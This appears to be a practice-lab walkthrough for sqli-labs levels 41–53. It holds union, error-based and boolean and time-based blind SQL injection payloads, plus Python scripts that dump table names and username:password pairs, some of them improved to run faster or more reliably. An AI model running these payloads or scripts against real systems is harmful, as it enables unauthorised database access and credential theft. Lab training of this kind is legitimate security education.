sqli.labs practice range (Levels 41-53)

41. Level 41

The id parameter is numeric (nothing to close) and the union result is reflected in the page, so the data can be read out directly:

-1 union select 1,2,3--+

-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')--+

-1 union select 1,2,(select group_concat(username,'~',password) from security.users)--+

42. Level 42

This level is a POST login form. login_password is closed with a single quote, so boolean-based blind injection works: a successful login returns a different page (and content length) from a failed one, and that difference is the oracle the script below uses.

123'+or+1=1--+

Script to dump the database:

import string
import requests

url = "http://sqli.labs/Less-42/login.php"

# Characters the original scans for: digits, lowercase letters and a handful of symbols.
# Extend it (uppercase, other symbols) if a value seems to stop early. Note that MySQL's
# default collation compares case-insensitively, so uppercase letters come back lowercase.
chars = list("1234567890") + list(string.ascii_lowercase) + list("@$^*()-_,./{}[]:;|")

# Content length of the "login successful" page. It depends on the installation:
# measure it once with a known-true payload such as  123' or 1=1#  before running.
SUCCESS_LEN = 1580


def truth(cond):
    """Inject a condition into login_password; True when the success page comes back."""
    data = {"login_user": "admin", "login_password": f"123' or {cond}#", "mysubmit": "Login"}
    res = requests.post(url, data=data)
    return len(res.content) == SUCCESS_LEN


def extract(expr, label, max_len=1000):
    """Recover the value of a SQL expression one character at a time."""
    print(f"{label}:")
    value = ""
    misses = 0                            # consecutive positions with no matching character
    for pos in range(1, max_len + 1):     # MySQL substr() positions start at 1
        for c in chars:
            if truth(f"substr(({expr}),{pos},1)='{c}'"):
                value += c
                print(c, end="", flush=True)
                misses = 0
                break
        else:
            misses += 1
            if misses >= 2:               # nothing matched twice in a row: end of the value
                break
    print()
    return value


if __name__ == "__main__":
    db = extract("database()", "Database", max_len=50)
    extract(f"select group_concat(table_name) from information_schema.tables "
            f"where table_schema='{db}'", "Tables")
    extract(f"select group_concat(column_name) from information_schema.columns "
            f"where table_name='users' and table_schema='{db}'", "Columns of users")
    extract("select group_concat(username,':',password) from users", "Users and passwords")

43. Level 43

This level is a POST request; the login_password parameter is closed with a single quote plus a parenthesis.

PoC: 111')--+ returns a MySQL error message, so error-based injection can be used. (The + is decoded to a space by PHP, which the -- comment needs.) Keep in mind that extractvalue() only shows the first 32 characters of the bad XPath string, so a long group_concat() result such as the whole users table has to be read out in pieces with substr().

111')+and+extractvalue(1,concat(0x7e,database(),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e))--+

111')+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users),0x7e))--+

44. Level 44

POST request; the login_password parameter is closed with a single quote.

Boolean-based blind injection works. PoC: 123'+or+length(database())=1--+

This script makes the injection straightforward:

import string
import requests

url = "http://sqli.labs/Less-44/login.php"

# Characters the original scans for: digits, lowercase letters and a handful of symbols.
# Extend it (uppercase, other symbols) if a value seems to stop early. Note that MySQL's
# default collation compares case-insensitively, so uppercase letters come back lowercase.
chars = list("1234567890") + list(string.ascii_lowercase) + list("@$^*()-_,./{}[]:;|")

# Content length of the "login successful" page. It depends on the installation:
# measure it once with a known-true payload such as  123' or 1=1#  before running.
SUCCESS_LEN = 1580


def truth(cond):
    """Inject a condition into login_password; True when the success page comes back."""
    data = {"login_user": "admin", "login_password": f"123' or {cond}#", "mysubmit": "Login"}
    res = requests.post(url, data=data)
    return len(res.content) == SUCCESS_LEN


def extract(expr, label, max_len=1000):
    """Recover the value of a SQL expression one character at a time."""
    print(f"{label}:")
    value = ""
    misses = 0                            # consecutive positions with no matching character
    for pos in range(1, max_len + 1):     # MySQL substr() positions start at 1
        for c in chars:
            if truth(f"substr(({expr}),{pos},1)='{c}'"):
                value += c
                print(c, end="", flush=True)
                misses = 0
                break
        else:
            misses += 1
            if misses >= 2:               # nothing matched twice in a row: end of the value
                break
    print()
    return value


if __name__ == "__main__":
    db = extract("database()", "Database", max_len=50)
    extract(f"select group_concat(table_name) from information_schema.tables "
            f"where table_schema='{db}'", "Tables")
    extract(f"select group_concat(column_name) from information_schema.columns "
            f"where table_name='users' and table_schema='{db}'", "Columns of users")
    extract("select group_concat(username,':',password) from users", "Users and passwords")

45. Level 45

Here the login_password parameter is closed with a single quote plus a parenthesis.

Boolean-based blind injection works. PoC: 123')+or+substr(database(),1,1)='a'--+

Script to dump the database:

import string
import requests

url = "http://sqli.labs/Less-45/login.php"

# Characters the original scans for: digits, lowercase letters and a handful of symbols.
# Extend it (uppercase, other symbols) if a value seems to stop early. Note that MySQL's
# default collation compares case-insensitively, so uppercase letters come back lowercase.
chars = list("1234567890") + list(string.ascii_lowercase) + list("@$^*()-_,./{}[]:;|")

# Content length of the "login successful" page. It depends on the installation:
# measure it once with a known-true payload such as  123') or 1=1#  before running.
SUCCESS_LEN = 1580


def truth(cond):
    """Inject a condition into login_password (quote plus parenthesis closed);
    True when the success page comes back."""
    data = {"login_user": "admin", "login_password": f"123') or {cond}#", "mysubmit": "Login"}
    res = requests.post(url, data=data)
    return len(res.content) == SUCCESS_LEN


def extract(expr, label, max_len=1000):
    """Recover the value of a SQL expression one character at a time."""
    print(f"{label}:")
    value = ""
    misses = 0                            # consecutive positions with no matching character
    for pos in range(1, max_len + 1):     # MySQL substr() positions start at 1
        for c in chars:
            if truth(f"substr(({expr}),{pos},1)='{c}'"):
                value += c
                print(c, end="", flush=True)
                misses = 0
                break
        else:
            misses += 1
            if misses >= 2:               # nothing matched twice in a row: end of the value
                break
    print()
    return value


if __name__ == "__main__":
    db = extract("database()", "Database", max_len=50)
    extract(f"select group_concat(table_name) from information_schema.tables "
            f"where table_schema='{db}'", "Tables")
    extract(f"select group_concat(column_name) from information_schema.columns "
            f"where table_name='users' and table_schema='{db}'", "Columns of users")
    extract("select group_concat(username,':',password) from users", "Users and passwords")
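The scripts for Levels 42, 44 and 45 try the candidate characters one at a time (up to about fifty requests per character) and depend on a hard-coded page length. As an added example, not code from the original post, the block below does the same boolean-blind extraction by binary search on each character's code point, which needs about eight requests per character. It runs offline against a constructed SQLite stand-in for the vulnerable login: the VulnerableLogin class, its two rows and the use of SQLite's unicode() in place of MySQL's ascii()/ord() are assumptions of this example, and the "-- " terminator plays the role of the page's "#".

```python
import sqlite3


class VulnerableLogin:
    """Constructed stand-in for the Less-42..45 login.php (not the lab's own code):
    the password is pasted into the SQL string, which is the bug the scripts above
    exploit. SQLite is used so the example runs offline; against the real lab the
    oracle is simply 'did the success page come back' (the response-length check)."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
        self.db.executemany("INSERT INTO users VALUES(?, ?, ?)",
                            [(1, "Dumb", "Dumb"), (8, "admin", "admin")])  # constructed rows
        self.requests = 0  # number of 'HTTP requests' the attack needed

    def login(self, password: str) -> bool:
        self.requests += 1
        sql = f"SELECT id FROM users WHERE username='admin' AND password='{password}'"
        try:
            return self.db.execute(sql).fetchone() is not None  # True == success page
        except sqlite3.Error:
            return False  # a broken query renders as a failed login


def blind_extract(oracle, expr: str, prefix: str = "123'", max_len: int = 200) -> str:
    """Boolean-blind extraction of the string value of SQL expression `expr`.

    `oracle(payload)` must return True when the injected condition holds. Each
    character is found by binary search on its code point (about 7 requests)
    instead of trying a character list entry by entry (up to ~50 requests).
    SQLite's unicode() stands in for MySQL's ascii()/ord(); '-- ' ends the
    query the way the page's '#' does.
    """
    def ask(cond: str) -> bool:
        return oracle(f"{prefix} or ({cond})-- ")

    out = []
    for pos in range(1, max_len + 1):            # substr() positions start at 1
        if not ask(f"length(({expr})) >= {pos}"):
            break                                # past the end of the value
        lo, hi = 32, 126                         # printable ASCII; widen for other data
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        # One confirming request catches characters outside the range or a flaky oracle.
        if not ask(f"unicode(substr(({expr}), {pos}, 1)) = {lo}"):
            raise ValueError(f"position {pos}: character outside 32..126 or unstable oracle")
        out.append(chr(lo))
    return "".join(out)


if __name__ == "__main__":
    site = VulnerableLogin()
    creds = blind_extract(site.login, "SELECT group_concat(username || ':' || password) FROM users")
    print(creds, "recovered in", site.requests, "requests")
```

Against the real level, pass a function that POSTs the payload as login_password and returns whether the success page came back; the extraction logic stays the same, with ascii() or ord() in place of unicode() and MySQL's concat() in place of ||.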

46. Level 46

The injection point is the sort parameter, which lands in ORDER BY. It is numeric and MySQL errors are displayed, so error-based injection works:

4+and+extractvalue(1,concat(0x7e,database()))

4+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

4+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') ))

47. Level 47

sort=1

sort=2

sort=3

sort=4

sort=4 should already produce an error: there are three columns in all. If errors are not displayed, time-based blind injection can be used instead.

48. Level 48

Much like the previous level, but the error output is gone. The sort parameter is numeric here (no quote to close, as the sort=1 and ... payload in the script shows), so the oracle has to be time-based.

Script:

import string
import time
import requests

url = "http://sqli.labs/Less-48/"

# Same character set as the boolean-blind scripts above.
chars = list("1234567890") + list(string.ascii_lowercase) + list("@$^*()-_,./{}[]:;|")

SLEEP = 1       # seconds passed to sleep()
# The injected expression lands in ORDER BY and is evaluated once per row, and the lab's
# users table has 13 rows, so a true condition delays the response by about 13 * SLEEP s.
# The original compares against exactly 13 s, which a true answer only just exceeds;
# lower THRESHOLD (to 10, say) if characters are being missed.
THRESHOLD = 13


def truth(cond):
    """Inject into the numeric sort parameter; True when the response was delayed."""
    params = {"sort": f"1 and {cond} and sleep({SLEEP})"}
    start = time.perf_counter()
    requests.get(url, params=params)
    return time.perf_counter() - start > THRESHOLD


def extract(expr, label, max_len=1000):
    """Recover the value of a SQL expression one character at a time."""
    print(f"{label}:")
    value = ""
    misses = 0                            # consecutive positions with no matching character
    for pos in range(1, max_len + 1):     # MySQL substr() positions start at 1
        for c in chars:
            if truth(f"substr(({expr}),{pos},1)='{c}'"):
                value += c
                print(c, end="", flush=True)
                misses = 0
                break
        else:
            misses += 1
            if misses >= 2:               # nothing matched twice in a row: end of the value
                break
    print()
    return value


if __name__ == "__main__":
    db = extract("database()", "Database", max_len=50)
    extract(f"select group_concat(table_name) from information_schema.tables "
            f"where table_schema='{db}'", "Tables")
    extract(f"select group_concat(column_name) from information_schema.columns "
            f"where table_name='users' and table_schema='{db}'", "Columns of users")
    extract("select group_concat(username,':',password) from users", "Users and passwords")

49. Level 49

Same as Level 48 (time-based blind), except that sort sits inside single quotes, so the quote has to be closed.

Script:

import string
import time
import requests

url = "http://sqli.labs/Less-49/"

# Same character set as the boolean-blind scripts above.
chars = list("1234567890") + list(string.ascii_lowercase) + list("@$^*()-_,./{}[]:;|")

SLEEP = 1       # seconds passed to sleep()
# ORDER BY evaluates the expression once per row; the lab's users table has 13 rows,
# so a true condition delays the response by about 13 * SLEEP s. The original compares
# against exactly 13 s; lower THRESHOLD (to 10, say) if characters are being missed.
THRESHOLD = 13


def truth(cond):
    """Close the single quote around sort and inject; True when the response was delayed.
    The comment is written as '-- -' rather than the '--+' of the hand-typed payloads:
    requests percent-encodes a '+', so it would no longer turn into the space '--' needs."""
    params = {"sort": f"1' and {cond} and sleep({SLEEP})-- -"}
    start = time.perf_counter()
    requests.get(url, params=params)
    return time.perf_counter() - start > THRESHOLD


def extract(expr, label, max_len=1000):
    """Recover the value of a SQL expression one character at a time."""
    print(f"{label}:")
    value = ""
    misses = 0                            # consecutive positions with no matching character
    for pos in range(1, max_len + 1):     # MySQL substr() positions start at 1
        for c in chars:
            if truth(f"substr(({expr}),{pos},1)='{c}'"):
                value += c
                print(c, end="", flush=True)
                misses = 0
                break
        else:
            misses += 1
            if misses >= 2:               # nothing matched twice in a row: end of the value
                break
    print()
    return value


if __name__ == "__main__":
    db = extract("database()", "Database", max_len=50)
    extract(f"select group_concat(table_name) from information_schema.tables "
            f"where table_schema='{db}'", "Tables")
    extract(f"select group_concat(column_name) from information_schema.columns "
            f"where table_name='users' and table_schema='{db}'", "Columns of users")
    extract("select group_concat(username,':',password) from users", "Users and passwords")

50. Level 50

Error messages are displayed, so try error-based injection:

sort=10+and+extractvalue(1,concat(0x7e,database()))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))

sort=10+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))

51. Level 51

Error messages are displayed, so error-based injection again; this time sort is closed with a single quote:

sort=3'+and+extractvalue(1,concat(0x7e,database()))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))--+

sort=3'+and+extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from security.users)))--+
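The error-based payloads for Levels 43, 46, 50 and 51 all push a group_concat() into extractvalue(), but the XPath error message only shows a short prefix of the string, so anything longer than one message (the full users table, for instance) has to be paged through. As an added example, not code from the original post, the block below reads a value of any length through the error message by always asking for the part that has not been recovered yet, so it does not depend on knowing the exact cut-off. It runs offline against a constructed model of the error output: the ErrorSim class, its rows and the 32-character limit it models are assumptions of this example, and the regex matches the message shape the page's payloads produce.

```python
import re
import sqlite3


class ErrorSim:
    """Constructed model of an error-based injection point like Less-43/46/50/51
    (not the lab's code). The expression is evaluated for real in SQLite; the MySQL
    behaviour being modelled is that extractvalue()/updatexml() echo the bad XPath
    string in the error message but only its first 32 characters (this example's
    assumption; the reader below does not rely on the exact number)."""

    LIMIT = 32

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
        self.db.executemany("INSERT INTO users VALUES (?, ?, ?)",   # constructed rows
                            [(1, "Dumb", "Dumb"), (8, "admin", "admin"), (12, "dhakkan", "dumbo")])
        self.requests = 0

    def page(self, expr: str) -> str:
        """Response to  ... and extractvalue(1, concat(0x7e, (expr)))  on this model."""
        self.requests += 1
        value = self.db.execute(f"SELECT ({expr})").fetchone()[0]
        xpath = "~" + ("" if value is None else str(value))
        return f"XPATH syntax error: '{xpath[:self.LIMIT]}'"


# The '~' (0x7e) marker the page's payloads prepend makes the start of the data easy to find.
ERR = re.compile(r"XPATH syntax error: '~([^']*)'")


def error_extract(page, expr: str, max_requests: int = 50) -> str:
    """Pull a value of any length through the truncated error message.

    Each request asks for the value from the position just after what has already
    been recovered, so the chunk size adapts to whatever the server actually shows
    and the loop ends on the first empty chunk.
    """
    out = ""
    for _ in range(max_requests):
        m = ERR.search(page(f"substr(({expr}), {len(out) + 1}, 100)"))
        if not m or not m.group(1):
            break                    # no error text, or nothing left to read
        out += m.group(1)
    return out


if __name__ == "__main__":
    sim = ErrorSim()
    print(error_extract(sim.page, "SELECT group_concat(username || ':' || password) FROM users"))
    print("requests:", sim.requests)
```

On the real level the page() function is an HTTP request whose body is searched for the XPATH error, and the MySQL form of the expression is the one used above (group_concat(username,':',password)).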

52. Level 52

No error messages, so it has to be blind, and time-based; sort is numeric.

Script:

import string
import time
import requests

url = "http://sqli.labs/Less-52/"

# Same character set as the boolean-blind scripts above.
chars = list("1234567890") + list(string.ascii_lowercase) + list("@$^*()-_,./{}[]:;|")

SLEEP = 1       # seconds passed to sleep()
# ORDER BY evaluates the expression once per row; the lab's users table has 13 rows,
# so a true condition delays the response by about 13 * SLEEP s. The original compares
# against exactly 13 s; lower THRESHOLD (to 10, say) if characters are being missed.
THRESHOLD = 13


def truth(cond):
    """Inject into the numeric sort parameter; True when the response was delayed.
    '-- -' is used instead of '--+' because requests percent-encodes the '+'."""
    params = {"sort": f"1 and {cond} and sleep({SLEEP})-- -"}
    start = time.perf_counter()
    requests.get(url, params=params)
    return time.perf_counter() - start > THRESHOLD


def extract(expr, label, max_len=1000):
    """Recover the value of a SQL expression one character at a time."""
    print(f"{label}:")
    value = ""
    misses = 0                            # consecutive positions with no matching character
    for pos in range(1, max_len + 1):     # MySQL substr() positions start at 1
        for c in chars:
            if truth(f"substr(({expr}),{pos},1)='{c}'"):
                value += c
                print(c, end="", flush=True)
                misses = 0
                break
        else:
            misses += 1
            if misses >= 2:               # nothing matched twice in a row: end of the value
                break
    print()
    return value


if __name__ == "__main__":
    db = extract("database()", "Database", max_len=50)
    extract(f"select group_concat(table_name) from information_schema.tables "
            f"where table_schema='{db}'", "Tables")
    extract(f"select group_concat(column_name) from information_schema.columns "
            f"where table_name='users' and table_schema='{db}'", "Columns of users")
    extract("select group_concat(username,':',password) from users", "Users and passwords")

53. Level 53

Single-quote closed and no error messages, so blind (time-based) again.

Script:

import string
import time
import requests

url = "http://sqli.labs/Less-53/"

# Same character set as the boolean-blind scripts above.
chars = list("1234567890") + list(string.ascii_lowercase) + list("@$^*()-_,./{}[]:;|")

SLEEP = 0.5     # seconds passed to sleep(); shorter than the earlier scripts to speed things up
# ORDER BY evaluates the expression once per row; the lab's users table has 13 rows,
# so a true condition delays the response by about 13 * SLEEP = 6.5 s, comfortably
# above this threshold.
THRESHOLD = 5


def truth(cond):
    """Close the single quote around sort and inject; True when the response was delayed.
    '-- -' is used instead of '--+' because requests percent-encodes the '+'."""
    params = {"sort": f"22' and {cond} and sleep({SLEEP})-- -"}
    start = time.perf_counter()
    requests.get(url, params=params)
    return time.perf_counter() - start > THRESHOLD


def extract(expr, label, max_len=1000):
    """Recover the value of a SQL expression one character at a time."""
    print(f"{label}:")
    value = ""
    misses = 0                            # consecutive positions with no matching character
    for pos in range(1, max_len + 1):     # MySQL substr() positions start at 1
        for c in chars:
            if truth(f"substr(({expr}),{pos},1)='{c}'"):
                value += c
                print(c, end="", flush=True)
                misses = 0
                break
        else:
            misses += 1
            if misses >= 2:               # nothing matched twice in a row: end of the value
                break
    print()
    return value


if __name__ == "__main__":
    db = extract("database()", "Database", max_len=50)
    extract(f"select group_concat(table_name) from information_schema.tables "
            f"where table_schema='{db}'", "Tables")
    extract(f"select group_concat(column_name) from information_schema.columns "
            f"where table_name='users' and table_schema='{db}'", "Columns of users")
    extract("select group_concat(username,':',password) from users", "Users and passwords")
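The time-based scripts for Levels 48, 49, 52 and 53 decide true/false with a fixed cut-off (more than 13 s for sleep(1), more than 5 s for sleep(0.5)). What makes those numbers work is that the injected sleep() sits in ORDER BY and runs once per row, and the lab's users table has 13 rows; a cut-off equal to the expected delay is fragile, and a single slow response can flip an answer. As an added example, not code from the original post, the block below calibrates the cut-off from measured baseline latency and re-measures ambiguous responses, with a constructed timing model standing in for the lab (the TimingSim class, its 13-row assumption, the modelled jitter and the sort_payload helper are all assumptions of this example; nothing here actually sleeps, so it runs offline in milliseconds).

```python
import random
import sqlite3


class TimingSim:
    """Constructed model of the Less-48..53 ORDER BY injection point (not the lab's
    code). MySQL evaluates the injected sleep() once per row the query returns, and
    the lab's users table has 13 rows: that is why sleep(1) costs about 13 s in the
    scripts above. The condition is evaluated for real in SQLite; the delay is
    computed instead of slept so the example runs offline."""

    ROWS = 13

    def __init__(self, seed: int = 0):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES (8, 'admin', 'admin')")  # constructed row
        self.rng = random.Random(seed)

    def request_seconds(self, cond: str, sleep_s: float) -> float:
        """Response time of  sort=1 and (cond) and sleep(sleep_s)  on this model."""
        is_true = self.db.execute(f"SELECT ({cond})").fetchone()[0] == 1
        latency = 0.05 + self.rng.uniform(0.0, 0.08)     # modelled network jitter
        return latency + (self.ROWS * sleep_s if is_true else 0.0)


class TimingOracle:
    """Turn response times into a reliable True/False answer."""

    def __init__(self, measure, sleep_s: float = 0.5, rows: int = 13, samples: int = 5):
        self.measure, self.sleep_s = measure, sleep_s
        self.expected = rows * sleep_s                        # delay of a true answer
        # Calibrate on a condition that is always false, so only network time is seen.
        self.baseline = max(measure("1=2", sleep_s) for _ in range(samples))
        # Sit halfway between the slowest clean response and the expected delay rather
        # than at the expected delay itself (the scripts above use > 13 s for 13 x sleep(1),
        # which a true answer only just exceeds).
        self.threshold = self.baseline + self.expected / 2

    def __call__(self, cond: str) -> bool:
        t = self.measure(cond, self.sleep_s)
        if abs(t - self.threshold) > self.expected / 4:       # clear-cut: one request is enough
            return t > self.threshold
        # Ambiguous timing (jitter, server load): majority of three measurements.
        votes = [t > self.threshold] + [self.measure(cond, self.sleep_s) > self.threshold
                                        for _ in range(2)]
        return votes.count(True) >= 2


def sort_payload(cond: str, sleep_s: float, quoted: bool, base: str = "1") -> str:
    """The two shapes used on the page: Less-48/52 take a bare number, Less-49/53 wrap
    sort in single quotes, so the quote is closed and the rest commented out ('-- -'
    survives URL encoding, unlike '--+')."""
    if quoted:
        return f"{base}' and ({cond}) and sleep({sleep_s})-- -"
    return f"{base} and ({cond}) and sleep({sleep_s})"


if __name__ == "__main__":
    sim = TimingSim()
    oracle = TimingOracle(sim.request_seconds, sleep_s=0.5)
    print("threshold %.2f s" % oracle.threshold)
    print("length(password)=5 ->", oracle("length((SELECT password FROM users)) = 5"))
    print(sort_payload("length(database())=8", 0.5, quoted=True))
```

On the real level, measure is a function that sends the sort payload with requests.get and returns the elapsed time from time.perf_counter(); the calibration and majority vote stay the same, and the oracle can then drive the character search from the scripts above.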

Source: user-submitted article reprinted at http://www.hqwc.cn/news/453654.html
